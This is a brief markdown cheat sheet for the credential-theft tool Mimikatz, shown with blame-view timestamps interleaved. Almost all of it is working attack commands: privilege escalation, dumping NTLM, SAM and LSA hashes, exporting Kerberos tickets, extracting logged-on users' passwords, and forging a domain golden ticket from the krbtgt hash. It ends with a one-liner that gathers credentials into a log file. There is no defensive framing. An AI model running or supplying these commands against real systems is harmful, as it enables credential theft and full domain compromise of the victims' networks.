2021-08-23 01:13:54 +02:00
|
|
|
# Mimikatz Usage
|
|
|
|
|
* Check your privilege, boy
|
|
|
|
|
```sh
|
2022-04-14 01:06:16 +02:00
|
|
|
privilege::debug
|
|
|
|
|
token::elevate
|
2021-08-23 01:13:54 +02:00
|
|
|
```
|
2022-04-14 01:06:16 +02:00
|
|
|
|
2021-08-23 01:13:54 +02:00
|
|
|
## Dump hashes
|
2022-04-14 01:06:16 +02:00
|
|
|
|
2021-08-23 01:13:54 +02:00
|
|
|
* NTLM
|
|
|
|
|
```sh
|
|
|
|
|
$ lsadump::lsa /patch
|
|
|
|
|
```
|
2022-04-14 01:06:16 +02:00
|
|
|
```sh
|
|
|
|
|
sekurlsa::tickets /export
|
|
|
|
|
```
|
2021-08-23 01:13:54 +02:00
|
|
|
|
|
|
|
|
## Dump Local Password hashes
|
2022-04-14 01:06:16 +02:00
|
|
|
|
2021-08-23 01:13:54 +02:00
|
|
|
```sh
|
|
|
|
|
token::elevate
|
|
|
|
|
```
|
|
|
|
|
```sh
|
|
|
|
|
lsadump::sam
|
|
|
|
|
```
|
|
|
|
|
|
2022-04-14 01:06:16 +02:00
|
|
|
* Form logged in users
|
|
|
|
|
```sh
|
|
|
|
|
sekurlsa::logonPasswords
|
|
|
|
|
```
|
|
|
|
|
|
2021-08-23 01:13:54 +02:00
|
|
|
## Golden ticket
|
|
|
|
|
* Dump krbtgt hashes and create a ticket, ticket is saved as ticket.kirbi
|
|
|
|
|
```sh
|
|
|
|
|
$ lsadump::lsa /inject /name:krbtgt
|
|
|
|
|
$ kerberos::golden /user:<userid> /domain:<domainname> /sid:<number behinde domainname> /krbtgt:<NTLMhash> /id:<RID(dec)>
|
|
|
|
|
```
|
|
|
|
|
* use the golden ticket, open a new elevated prompt
|
|
|
|
|
```sh
|
|
|
|
|
misc::cmd
|
|
|
|
|
```
|
2021-12-04 00:26:03 +01:00
|
|
|
|
|
|
|
|
## Oneliner
|
|
|
|
|
* Get the stuff
|
|
|
|
|
```sh
|
|
|
|
|
.\mimikatz "log host-42.log" "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" exit
|
|
|
|
|
```
|
|
|
|
|
|
